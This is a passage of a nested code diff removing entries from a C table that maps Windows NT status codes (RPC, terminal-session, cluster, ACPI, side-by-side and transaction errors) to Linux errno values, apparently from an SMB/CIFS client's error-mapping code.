+-	{EPT_NT_CANT_CREATE, -EIO, "EPT_NT_CANT_CREATE"},
+-	{RPC_NT_INVALID_OBJECT, -EIO, "RPC_NT_INVALID_OBJECT"},
+-	{RPC_NT_NO_INTERFACES, -EIO, "RPC_NT_NO_INTERFACES"},
+-	{RPC_NT_CALL_CANCELLED, -EIO, "RPC_NT_CALL_CANCELLED"},
+-	{RPC_NT_BINDING_INCOMPLETE, -EIO, "RPC_NT_BINDING_INCOMPLETE"},
+-	{RPC_NT_COMM_FAILURE, -EIO, "RPC_NT_COMM_FAILURE"},
+-	{RPC_NT_UNSUPPORTED_AUTHN_LEVEL, -EIO,
+-	"RPC_NT_UNSUPPORTED_AUTHN_LEVEL"},
+-	{RPC_NT_NO_PRINC_NAME, -EIO, "RPC_NT_NO_PRINC_NAME"},
+-	{RPC_NT_NOT_RPC_ERROR, -EIO, "RPC_NT_NOT_RPC_ERROR"},
+-	{RPC_NT_SEC_PKG_ERROR, -EIO, "RPC_NT_SEC_PKG_ERROR"},
+-	{RPC_NT_NOT_CANCELLED, -EIO, "RPC_NT_NOT_CANCELLED"},
+-	{RPC_NT_INVALID_ASYNC_HANDLE, -EIO, "RPC_NT_INVALID_ASYNC_HANDLE"},
+-	{RPC_NT_INVALID_ASYNC_CALL, -EIO, "RPC_NT_INVALID_ASYNC_CALL"},
+-	{RPC_NT_PROXY_ACCESS_DENIED, -EACCES, "RPC_NT_PROXY_ACCESS_DENIED"},
+-	{RPC_NT_NO_MORE_ENTRIES, -EIO, "RPC_NT_NO_MORE_ENTRIES"},
+-	{RPC_NT_SS_CHAR_TRANS_OPEN_FAIL, -EIO,
+-	"RPC_NT_SS_CHAR_TRANS_OPEN_FAIL"},
+-	{RPC_NT_SS_CHAR_TRANS_SHORT_FILE, -EIO,
+-	"RPC_NT_SS_CHAR_TRANS_SHORT_FILE"},
+-	{RPC_NT_SS_IN_NULL_CONTEXT, -EIO, "RPC_NT_SS_IN_NULL_CONTEXT"},
+-	{RPC_NT_SS_CONTEXT_MISMATCH, -EIO, "RPC_NT_SS_CONTEXT_MISMATCH"},
+-	{RPC_NT_SS_CONTEXT_DAMAGED, -EIO, "RPC_NT_SS_CONTEXT_DAMAGED"},
+-	{RPC_NT_SS_HANDLES_MISMATCH, -EIO, "RPC_NT_SS_HANDLES_MISMATCH"},
+-	{RPC_NT_SS_CANNOT_GET_CALL_HANDLE, -EIO,
+-	"RPC_NT_SS_CANNOT_GET_CALL_HANDLE"},
+-	{RPC_NT_NULL_REF_POINTER, -EIO, "RPC_NT_NULL_REF_POINTER"},
+-	{RPC_NT_ENUM_VALUE_OUT_OF_RANGE, -EIO,
+-	"RPC_NT_ENUM_VALUE_OUT_OF_RANGE"},
+-	{RPC_NT_BYTE_COUNT_TOO_SMALL, -EIO, "RPC_NT_BYTE_COUNT_TOO_SMALL"},
+-	{RPC_NT_BAD_STUB_DATA, -EIO, "RPC_NT_BAD_STUB_DATA"},
+-	{RPC_NT_INVALID_ES_ACTION, -EIO, "RPC_NT_INVALID_ES_ACTION"},
+-	{RPC_NT_WRONG_ES_VERSION, -EIO, "RPC_NT_WRONG_ES_VERSION"},
+-	{RPC_NT_WRONG_STUB_VERSION, -EIO, "RPC_NT_WRONG_STUB_VERSION"},
+-	{RPC_NT_INVALID_PIPE_OBJECT, -EIO, "RPC_NT_INVALID_PIPE_OBJECT"},
+-	{RPC_NT_INVALID_PIPE_OPERATION, -EIO, "RPC_NT_INVALID_PIPE_OPERATION"},
+-	{RPC_NT_WRONG_PIPE_VERSION, -EIO, "RPC_NT_WRONG_PIPE_VERSION"},
+-	{RPC_NT_PIPE_CLOSED, -EIO, "RPC_NT_PIPE_CLOSED"},
+-	{RPC_NT_PIPE_DISCIPLINE_ERROR, -EIO, "RPC_NT_PIPE_DISCIPLINE_ERROR"},
+-	{RPC_NT_PIPE_EMPTY, -EIO, "RPC_NT_PIPE_EMPTY"},
+-	{STATUS_PNP_BAD_MPS_TABLE, -EIO, "STATUS_PNP_BAD_MPS_TABLE"},
+-	{STATUS_PNP_TRANSLATION_FAILED, -EIO, "STATUS_PNP_TRANSLATION_FAILED"},
+-	{STATUS_PNP_IRQ_TRANSLATION_FAILED, -EIO,
+-	"STATUS_PNP_IRQ_TRANSLATION_FAILED"},
+-	{STATUS_PNP_INVALID_ID, -EIO, "STATUS_PNP_INVALID_ID"},
+-	{STATUS_IO_REISSUE_AS_CACHED, -EIO, "STATUS_IO_REISSUE_AS_CACHED"},
+-	{STATUS_CTX_WINSTATION_NAME_INVALID, -EIO,
+-	"STATUS_CTX_WINSTATION_NAME_INVALID"},
+-	{STATUS_CTX_INVALID_PD, -EIO, "STATUS_CTX_INVALID_PD"},
+-	{STATUS_CTX_PD_NOT_FOUND, -EIO, "STATUS_CTX_PD_NOT_FOUND"},
+-	{STATUS_CTX_CLOSE_PENDING, -EIO, "STATUS_CTX_CLOSE_PENDING"},
+-	{STATUS_CTX_NO_OUTBUF, -EIO, "STATUS_CTX_NO_OUTBUF"},
+-	{STATUS_CTX_MODEM_INF_NOT_FOUND, -EIO,
+-	"STATUS_CTX_MODEM_INF_NOT_FOUND"},
+-	{STATUS_CTX_INVALID_MODEMNAME, -EIO, "STATUS_CTX_INVALID_MODEMNAME"},
+-	{STATUS_CTX_RESPONSE_ERROR, -EIO, "STATUS_CTX_RESPONSE_ERROR"},
+-	{STATUS_CTX_MODEM_RESPONSE_TIMEOUT, -ETIMEDOUT,
+-	"STATUS_CTX_MODEM_RESPONSE_TIMEOUT"},
+-	{STATUS_CTX_MODEM_RESPONSE_NO_CARRIER, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_NO_CARRIER"},
+-	{STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE"},
+-	{STATUS_CTX_MODEM_RESPONSE_BUSY, -EBUSY,
+-	"STATUS_CTX_MODEM_RESPONSE_BUSY"},
+-	{STATUS_CTX_MODEM_RESPONSE_VOICE, -EIO,
+-	"STATUS_CTX_MODEM_RESPONSE_VOICE"},
+-	{STATUS_CTX_TD_ERROR, -EIO, "STATUS_CTX_TD_ERROR"},
+-	{STATUS_CTX_LICENSE_CLIENT_INVALID, -EIO,
+-	"STATUS_CTX_LICENSE_CLIENT_INVALID"},
+-	{STATUS_CTX_LICENSE_NOT_AVAILABLE, -EIO,
+-	"STATUS_CTX_LICENSE_NOT_AVAILABLE"},
+-	{STATUS_CTX_LICENSE_EXPIRED, -EIO, "STATUS_CTX_LICENSE_EXPIRED"},
+-	{STATUS_CTX_WINSTATION_NOT_FOUND, -EIO,
+-	"STATUS_CTX_WINSTATION_NOT_FOUND"},
+-	{STATUS_CTX_WINSTATION_NAME_COLLISION, -EIO,
+-	"STATUS_CTX_WINSTATION_NAME_COLLISION"},
+-	{STATUS_CTX_WINSTATION_BUSY, -EBUSY, "STATUS_CTX_WINSTATION_BUSY"},
+-	{STATUS_CTX_BAD_VIDEO_MODE, -EIO, "STATUS_CTX_BAD_VIDEO_MODE"},
+-	{STATUS_CTX_GRAPHICS_INVALID, -EIO, "STATUS_CTX_GRAPHICS_INVALID"},
+-	{STATUS_CTX_NOT_CONSOLE, -EIO, "STATUS_CTX_NOT_CONSOLE"},
+-	{STATUS_CTX_CLIENT_QUERY_TIMEOUT, -EIO,
+-	"STATUS_CTX_CLIENT_QUERY_TIMEOUT"},
+-	{STATUS_CTX_CONSOLE_DISCONNECT, -EIO, "STATUS_CTX_CONSOLE_DISCONNECT"},
+-	{STATUS_CTX_CONSOLE_CONNECT, -EIO, "STATUS_CTX_CONSOLE_CONNECT"},
+-	{STATUS_CTX_SHADOW_DENIED, -EIO, "STATUS_CTX_SHADOW_DENIED"},
+-	{STATUS_CTX_WINSTATION_ACCESS_DENIED, -EACCES,
+-	"STATUS_CTX_WINSTATION_ACCESS_DENIED"},
+-	{STATUS_CTX_INVALID_WD, -EIO, "STATUS_CTX_INVALID_WD"},
+-	{STATUS_CTX_WD_NOT_FOUND, -EIO, "STATUS_CTX_WD_NOT_FOUND"},
+-	{STATUS_CTX_SHADOW_INVALID, -EIO, "STATUS_CTX_SHADOW_INVALID"},
+-	{STATUS_CTX_SHADOW_DISABLED, -EIO, "STATUS_CTX_SHADOW_DISABLED"},
+-	{STATUS_RDP_PROTOCOL_ERROR, -EIO, "STATUS_RDP_PROTOCOL_ERROR"},
+-	{STATUS_CTX_CLIENT_LICENSE_NOT_SET, -EIO,
+-	"STATUS_CTX_CLIENT_LICENSE_NOT_SET"},
+-	{STATUS_CTX_CLIENT_LICENSE_IN_USE, -EIO,
+-	"STATUS_CTX_CLIENT_LICENSE_IN_USE"},
+-	{STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE, -EIO,
+-	"STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE"},
+-	{STATUS_CTX_SHADOW_NOT_RUNNING, -EIO, "STATUS_CTX_SHADOW_NOT_RUNNING"},
+-	{STATUS_CTX_LOGON_DISABLED, -EIO, "STATUS_CTX_LOGON_DISABLED"},
+-	{STATUS_CTX_SECURITY_LAYER_ERROR, -EIO,
+-	"STATUS_CTX_SECURITY_LAYER_ERROR"},
+-	{STATUS_TS_INCOMPATIBLE_SESSIONS, -EIO,
+-	"STATUS_TS_INCOMPATIBLE_SESSIONS"},
+-	{STATUS_MUI_FILE_NOT_FOUND, -EIO, "STATUS_MUI_FILE_NOT_FOUND"},
+-	{STATUS_MUI_INVALID_FILE, -EIO, "STATUS_MUI_INVALID_FILE"},
+-	{STATUS_MUI_INVALID_RC_CONFIG, -EIO, "STATUS_MUI_INVALID_RC_CONFIG"},
+-	{STATUS_MUI_INVALID_LOCALE_NAME, -EIO,
+-	"STATUS_MUI_INVALID_LOCALE_NAME"},
+-	{STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME, -EIO,
+-	"STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME"},
+-	{STATUS_MUI_FILE_NOT_LOADED, -EIO, "STATUS_MUI_FILE_NOT_LOADED"},
+-	{STATUS_RESOURCE_ENUM_USER_STOP, -EIO,
+-	"STATUS_RESOURCE_ENUM_USER_STOP"},
+-	{STATUS_CLUSTER_INVALID_NODE, -EIO, "STATUS_CLUSTER_INVALID_NODE"},
+-	{STATUS_CLUSTER_NODE_EXISTS, -EIO, "STATUS_CLUSTER_NODE_EXISTS"},
+-	{STATUS_CLUSTER_JOIN_IN_PROGRESS, -EIO,
+-	"STATUS_CLUSTER_JOIN_IN_PROGRESS"},
+-	{STATUS_CLUSTER_NODE_NOT_FOUND, -EIO, "STATUS_CLUSTER_NODE_NOT_FOUND"},
+-	{STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND"},
+-	{STATUS_CLUSTER_NETWORK_EXISTS, -EIO, "STATUS_CLUSTER_NETWORK_EXISTS"},
+-	{STATUS_CLUSTER_NETWORK_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_NETWORK_NOT_FOUND"},
+-	{STATUS_CLUSTER_NETINTERFACE_EXISTS, -EIO,
+-	"STATUS_CLUSTER_NETINTERFACE_EXISTS"},
+-	{STATUS_CLUSTER_NETINTERFACE_NOT_FOUND, -EIO,
+-	"STATUS_CLUSTER_NETINTERFACE_NOT_FOUND"},
+-	{STATUS_CLUSTER_INVALID_REQUEST, -EIO,
+-	"STATUS_CLUSTER_INVALID_REQUEST"},
+-	{STATUS_CLUSTER_INVALID_NETWORK_PROVIDER, -EIO,
+-	"STATUS_CLUSTER_INVALID_NETWORK_PROVIDER"},
+-	{STATUS_CLUSTER_NODE_DOWN, -EIO, "STATUS_CLUSTER_NODE_DOWN"},
+-	{STATUS_CLUSTER_NODE_UNREACHABLE, -EIO,
+-	"STATUS_CLUSTER_NODE_UNREACHABLE"},
+-	{STATUS_CLUSTER_NODE_NOT_MEMBER, -EIO,
+-	"STATUS_CLUSTER_NODE_NOT_MEMBER"},
+-	{STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS, -EIO,
+-	"STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS"},
+-	{STATUS_CLUSTER_INVALID_NETWORK, -EIO,
+-	"STATUS_CLUSTER_INVALID_NETWORK"},
+-	{STATUS_CLUSTER_NO_NET_ADAPTERS, -EIO,
+-	"STATUS_CLUSTER_NO_NET_ADAPTERS"},
+-	{STATUS_CLUSTER_NODE_UP, -EIO, "STATUS_CLUSTER_NODE_UP"},
+-	{STATUS_CLUSTER_NODE_PAUSED, -EIO, "STATUS_CLUSTER_NODE_PAUSED"},
+-	{STATUS_CLUSTER_NODE_NOT_PAUSED, -EIO,
+-	"STATUS_CLUSTER_NODE_NOT_PAUSED"},
+-	{STATUS_CLUSTER_NO_SECURITY_CONTEXT, -EIO,
+-	"STATUS_CLUSTER_NO_SECURITY_CONTEXT"},
+-	{STATUS_CLUSTER_NETWORK_NOT_INTERNAL, -EIO,
+-	"STATUS_CLUSTER_NETWORK_NOT_INTERNAL"},
+-	{STATUS_CLUSTER_POISONED, -EIO, "STATUS_CLUSTER_POISONED"},
+-	{STATUS_ACPI_INVALID_OPCODE, -EIO, "STATUS_ACPI_INVALID_OPCODE"},
+-	{STATUS_ACPI_STACK_OVERFLOW, -EIO, "STATUS_ACPI_STACK_OVERFLOW"},
+-	{STATUS_ACPI_ASSERT_FAILED, -EIO, "STATUS_ACPI_ASSERT_FAILED"},
+-	{STATUS_ACPI_INVALID_INDEX, -EIO, "STATUS_ACPI_INVALID_INDEX"},
+-	{STATUS_ACPI_INVALID_ARGUMENT, -EIO, "STATUS_ACPI_INVALID_ARGUMENT"},
+-	{STATUS_ACPI_FATAL, -EIO, "STATUS_ACPI_FATAL"},
+-	{STATUS_ACPI_INVALID_SUPERNAME, -EIO, "STATUS_ACPI_INVALID_SUPERNAME"},
+-	{STATUS_ACPI_INVALID_ARGTYPE, -EIO, "STATUS_ACPI_INVALID_ARGTYPE"},
+-	{STATUS_ACPI_INVALID_OBJTYPE, -EIO, "STATUS_ACPI_INVALID_OBJTYPE"},
+-	{STATUS_ACPI_INVALID_TARGETTYPE, -EIO,
+-	"STATUS_ACPI_INVALID_TARGETTYPE"},
+-	{STATUS_ACPI_INCORRECT_ARGUMENT_COUNT, -EIO,
+-	"STATUS_ACPI_INCORRECT_ARGUMENT_COUNT"},
+-	{STATUS_ACPI_ADDRESS_NOT_MAPPED, -EIO,
+-	"STATUS_ACPI_ADDRESS_NOT_MAPPED"},
+-	{STATUS_ACPI_INVALID_EVENTTYPE, -EIO, "STATUS_ACPI_INVALID_EVENTTYPE"},
+-	{STATUS_ACPI_HANDLER_COLLISION, -EIO, "STATUS_ACPI_HANDLER_COLLISION"},
+-	{STATUS_ACPI_INVALID_DATA, -EIO, "STATUS_ACPI_INVALID_DATA"},
+-	{STATUS_ACPI_INVALID_REGION, -EIO, "STATUS_ACPI_INVALID_REGION"},
+-	{STATUS_ACPI_INVALID_ACCESS_SIZE, -EIO,
+-	"STATUS_ACPI_INVALID_ACCESS_SIZE"},
+-	{STATUS_ACPI_ACQUIRE_GLOBAL_LOCK, -EIO,
+-	"STATUS_ACPI_ACQUIRE_GLOBAL_LOCK"},
+-	{STATUS_ACPI_ALREADY_INITIALIZED, -EIO,
+-	"STATUS_ACPI_ALREADY_INITIALIZED"},
+-	{STATUS_ACPI_NOT_INITIALIZED, -EIO, "STATUS_ACPI_NOT_INITIALIZED"},
+-	{STATUS_ACPI_INVALID_MUTEX_LEVEL, -EIO,
+-	"STATUS_ACPI_INVALID_MUTEX_LEVEL"},
+-	{STATUS_ACPI_MUTEX_NOT_OWNED, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNED"},
+-	{STATUS_ACPI_MUTEX_NOT_OWNER, -EIO, "STATUS_ACPI_MUTEX_NOT_OWNER"},
+-	{STATUS_ACPI_RS_ACCESS, -EIO, "STATUS_ACPI_RS_ACCESS"},
+-	{STATUS_ACPI_INVALID_TABLE, -EIO, "STATUS_ACPI_INVALID_TABLE"},
+-	{STATUS_ACPI_REG_HANDLER_FAILED, -EIO,
+-	"STATUS_ACPI_REG_HANDLER_FAILED"},
+-	{STATUS_ACPI_POWER_REQUEST_FAILED, -EIO,
+-	"STATUS_ACPI_POWER_REQUEST_FAILED"},
+-	{STATUS_SXS_SECTION_NOT_FOUND, -EIO, "STATUS_SXS_SECTION_NOT_FOUND"},
+-	{STATUS_SXS_CANT_GEN_ACTCTX, -EIO, "STATUS_SXS_CANT_GEN_ACTCTX"},
+-	{STATUS_SXS_INVALID_ACTCTXDATA_FORMAT, -EIO,
+-	"STATUS_SXS_INVALID_ACTCTXDATA_FORMAT"},
+-	{STATUS_SXS_ASSEMBLY_NOT_FOUND, -EIO, "STATUS_SXS_ASSEMBLY_NOT_FOUND"},
+-	{STATUS_SXS_MANIFEST_FORMAT_ERROR, -EIO,
+-	"STATUS_SXS_MANIFEST_FORMAT_ERROR"},
+-	{STATUS_SXS_MANIFEST_PARSE_ERROR, -EIO,
+-	"STATUS_SXS_MANIFEST_PARSE_ERROR"},
+-	{STATUS_SXS_ACTIVATION_CONTEXT_DISABLED, -EIO,
+-	"STATUS_SXS_ACTIVATION_CONTEXT_DISABLED"},
+-	{STATUS_SXS_KEY_NOT_FOUND, -EIO, "STATUS_SXS_KEY_NOT_FOUND"},
+-	{STATUS_SXS_VERSION_CONFLICT, -EIO, "STATUS_SXS_VERSION_CONFLICT"},
+-	{STATUS_SXS_WRONG_SECTION_TYPE, -EIO, "STATUS_SXS_WRONG_SECTION_TYPE"},
+-	{STATUS_SXS_THREAD_QUERIES_DISABLED, -EIO,
+-	"STATUS_SXS_THREAD_QUERIES_DISABLED"},
+-	{STATUS_SXS_ASSEMBLY_MISSING, -EIO, "STATUS_SXS_ASSEMBLY_MISSING"},
+-	{STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET, -EIO,
+-	"STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET"},
+-	{STATUS_SXS_EARLY_DEACTIVATION, -EIO, "STATUS_SXS_EARLY_DEACTIVATION"},
+-	{STATUS_SXS_INVALID_DEACTIVATION, -EIO,
+-	"STATUS_SXS_INVALID_DEACTIVATION"},
+-	{STATUS_SXS_MULTIPLE_DEACTIVATION, -EIO,
+-	"STATUS_SXS_MULTIPLE_DEACTIVATION"},
+-	{STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY, -EIO,
+-	"STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY"},
+-	{STATUS_SXS_PROCESS_TERMINATION_REQUESTED, -EIO,
+-	"STATUS_SXS_PROCESS_TERMINATION_REQUESTED"},
+-	{STATUS_SXS_CORRUPT_ACTIVATION_STACK, -EIO,
+-	"STATUS_SXS_CORRUPT_ACTIVATION_STACK"},
+-	{STATUS_SXS_CORRUPTION, -EIO, "STATUS_SXS_CORRUPTION"},
+-	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE, -EIO,
+-	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE"},
+-	{STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME, -EIO,
+-	"STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME"},
+-	{STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE, -EIO,
+-	"STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE"},
+-	{STATUS_SXS_IDENTITY_PARSE_ERROR, -EIO,
+-	"STATUS_SXS_IDENTITY_PARSE_ERROR"},
+-	{STATUS_SXS_COMPONENT_STORE_CORRUPT, -EIO,
+-	"STATUS_SXS_COMPONENT_STORE_CORRUPT"},
+-	{STATUS_SXS_FILE_HASH_MISMATCH, -EIO, "STATUS_SXS_FILE_HASH_MISMATCH"},
+-	{STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT, -EIO,
+-	"STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT"},
+-	{STATUS_SXS_IDENTITIES_DIFFERENT, -EIO,
+-	"STATUS_SXS_IDENTITIES_DIFFERENT"},
+-	{STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT, -EIO,
+-	"STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT"},
+-	{STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY, -EIO,
+-	"STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY"},
+-	{STATUS_ADVANCED_INSTALLER_FAILED, -EIO,
+-	"STATUS_ADVANCED_INSTALLER_FAILED"},
+-	{STATUS_XML_ENCODING_MISMATCH, -EIO, "STATUS_XML_ENCODING_MISMATCH"},
+-	{STATUS_SXS_MANIFEST_TOO_BIG, -EIO, "STATUS_SXS_MANIFEST_TOO_BIG"},
+-	{STATUS_SXS_SETTING_NOT_REGISTERED, -EIO,
+-	"STATUS_SXS_SETTING_NOT_REGISTERED"},
+-	{STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE, -EIO,
+-	"STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE"},
+-	{STATUS_SMI_PRIMITIVE_INSTALLER_FAILED, -EIO,
+-	"STATUS_SMI_PRIMITIVE_INSTALLER_FAILED"},
+-	{STATUS_GENERIC_COMMAND_FAILED, -EIO, "STATUS_GENERIC_COMMAND_FAILED"},
+-	{STATUS_SXS_FILE_HASH_MISSING, -EIO, "STATUS_SXS_FILE_HASH_MISSING"},
+-	{STATUS_TRANSACTIONAL_CONFLICT, -EIO, "STATUS_TRANSACTIONAL_CONFLICT"},
+-	{STATUS_INVALID_TRANSACTION, -EIO, "STATUS_INVALID_TRANSACTION"},
+-	{STATUS_TRANSACTION_NOT_ACTIVE, -EIO, "STATUS_TRANSACTION_NOT_ACTIVE"},
+-	{STATUS_TM_INITIALIZATION_FAILED, -EIO,
+-	"STATUS_TM_INITIALIZATION_FAILED"},
+-	{STATUS_RM_NOT_ACTIVE, -EIO, "STATUS_RM_NOT_ACTIVE"},
+-	{STATUS_RM_METADATA_CORRUPT, -EIO, "STATUS_RM_METADATA_CORRUPT"},
+-	{STATUS_TRANSACTION_NOT_JOINED, -EIO, "STATUS_TRANSACTION_NOT_JOINED"},
+-	{STATUS_DIRECTORY_NOT_RM, -EIO, "STATUS_DIRECTORY_NOT_RM"},
+-	{STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE, -EIO,
+-	"STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE"},
+-	{STATUS_LOG_RESIZE_INVALID_SIZE, -EIO,
+-	"STATUS_LOG_RESIZE_INVALID_SIZE"},
+-	{STATUS_REMOTE_FILE_VERSION_MISMATCH, -EIO,
+-	"STATUS_REMOTE_FILE_VERSION_MISMATCH"},
+-	{STATUS_CRM_PROTOCOL_ALREADY_EXISTS, -EIO,
+-	"STATUS_CRM_PROTOCOL_ALREADY_EXISTS"},
+-	{STATUS_TRANSACTION_PROPAGATION_FAILED, -EIO,
+-	"STATUS_TRANSACTION_PROPAGATION_FAILED"},
+-	{STATUS_CRM_PROTOCOL_NOT_FOUND, -EIO, "STATUS_CRM_PROTOCOL_NOT_FOUND"},
+-	{STATUS_TRANSACTION_SUPERIOR_EXISTS, -EIO,
+-	"STATUS_TRANSACTION_SUPERIOR_EXISTS"},
+-	{STATUS_TRANSACTION_REQUEST_NOT_VALID, -EIO,
+-	"STATUS_TRANSACTION_REQUEST_NOT_VALID"},
+-	{STATUS_TRANSACTION_NOT_REQUESTED, -EIO,
+-	"STATUS_TRANSACTION_NOT_REQUESTED"},
+-	{STATUS_TRANSACTION_ALREADY_ABORTED, -EIO,
+-	"STATUS_TRANSACTION_ALREADY_ABORTED"},
+-	{STATUS_TRANSACTION_ALREADY_COMMITTED, -EIO,
+-	"STATUS_TRANSACTION_ALREADY_COMMITTED"},
+-	{STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER, -EIO,
+-	"STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER"},
+-	{STATUS_CURRENT_TRANSACTION_NOT_VALID, -EIO,
+-	"STATUS_CURRENT_TRANSACTION_NOT_VALID"},
+-	{STATUS_LOG_GROWTH_FAILED, -EIO, "STATUS_LOG_GROWTH_FAILED"},
+-	{STATUS_OBJECT_NO_LONGER_EXISTS, -EIO,
+-	"STATUS_OBJECT_NO_LONGER_EXISTS"},
+-	{STATUS_STREAM_MINIVERSION_NOT_FOUND, -EIO,
+-	"STATUS_STREAM_MINIVERSION_NOT_FOUND"},
+-	{STATUS_STREAM_MINIVERSION_NOT_VALID, -EIO,
+-	"STATUS_STREAM_MINIVERSION_NOT_VALID"},
+-	{STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION, -EIO,
+-	"STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION"},
+-	{STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT, -EIO,
+-	"STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT"},
+-	{STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS, -EIO,
+-	"STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS"},
+-	{STATUS_HANDLE_NO_LONGER_VALID, -EIO, "STATUS_HANDLE_NO_LONGER_VALID"},
+-	{STATUS_LOG_CORRUPTION_DETECTED, -EIO,
+-	"STATUS_LOG_CORRUPTION_DETECTED"},
+-	{STATUS_RM_DISCONNECTED, -EIO, "STATUS_RM_DISCONNECTED"},
+-	{STATUS_ENLISTMENT_NOT_SUPERIOR, -EIO,
+-	"STATUS_ENLISTMENT_NOT_SUPERIOR"},
+-	{STATUS_FILE_IDENTITY_NOT_PERSISTENT, -EIO,
+-	"STATUS_FILE_IDENTITY_NOT_PERSISTENT"},
+-	{STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY, -EIO,
+-	"STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY"},
+-	{STATUS_CANT_CROSS_RM_BOUNDARY, -EIO, "STATUS_CANT_CROSS_RM_BOUNDARY"},
+-	{STATUS_TXF_DIR_NOT_EMPTY, -EIO, "STATUS_TXF_DIR_NOT_EMPTY"},
+-	{STATUS_INDOUBT_TRANSACTIONS_EXIST, -EIO,
+-	"STATUS_INDOUBT_TRANSACTIONS_EXIST"},
+-	{STATUS_TM_VOLATILE, -EIO, "STATUS_TM_VOLATILE"},
+-	{STATUS_ROLLBACK_TIMER_EXPIRED, -EIO, "STATUS_ROLLBACK_TIMER_EXPIRED"},
+-	{STATUS_TXF_ATTRIBUTE_CORRUPT, -EIO, "STATUS_TXF_ATTRIBUTE_CORRUPT"},
+-	{STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED, -EIO,
+-	"STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED"},
+-	{STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE, -EIO,
+-	"STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE"},
+-	{STATUS_TRANSACTION_REQUIRED_PROMOTION, -EIO,
+-	"STATUS_TRANSACTION_REQUIRED_PROMOTION"},
+-	{STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION, -EIO,
+-	"STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION"},
+-	{STATUS_TRANSACTIONS_NOT_FROZEN, -EIO,
+-	"STATUS_TRANSACTIONS_NOT_FROZEN"},
+-	{STATUS_TRANSACTION_FREEZE_IN_PROGRESS, -EIO,
+-	"STATUS_TRANSACTION_FREEZE_IN_PROGRESS"},
+-	{STATUS_NOT_SNAPSHOT_VOLUME, -EIO, "STATUS_NOT_SNAPSHOT_VOLUME"},
+-	{STATUS_NO_SAVEPOINT_WITH_OPEN_FILES, -EIO,
+-	"STATUS_NO_SAVEPOINT_WITH_OPEN_FILES"},
+-	{STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TM_IDENTITY_MISMATCH, -EIO, "STATUS_TM_IDENTITY_MISMATCH"},
+-	{STATUS_FLOATED_SECTION, -EIO, "STATUS_FLOATED_SECTION"},
+-	{STATUS_CANNOT_ACCEPT_TRANSACTED_WORK, -EIO,
+-	"STATUS_CANNOT_ACCEPT_TRANSACTED_WORK"},
+-	{STATUS_CANNOT_ABORT_TRANSACTIONS, -EIO,
+-	"STATUS_CANNOT_ABORT_TRANSACTIONS"},
+-	{STATUS_TRANSACTION_NOT_FOUND, -EIO, "STATUS_TRANSACTION_NOT_FOUND"},
+-	{STATUS_RESOURCEMANAGER_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCEMANAGER_NOT_FOUND"},
+-	{STATUS_ENLISTMENT_NOT_FOUND, -EIO, "STATUS_ENLISTMENT_NOT_FOUND"},
+-	{STATUS_TRANSACTIONMANAGER_NOT_FOUND, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_NOT_FOUND"},
+-	{STATUS_TRANSACTIONMANAGER_NOT_ONLINE, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_NOT_ONLINE"},
+-	{STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION"},
+-	{STATUS_TRANSACTION_NOT_ROOT, -EIO, "STATUS_TRANSACTION_NOT_ROOT"},
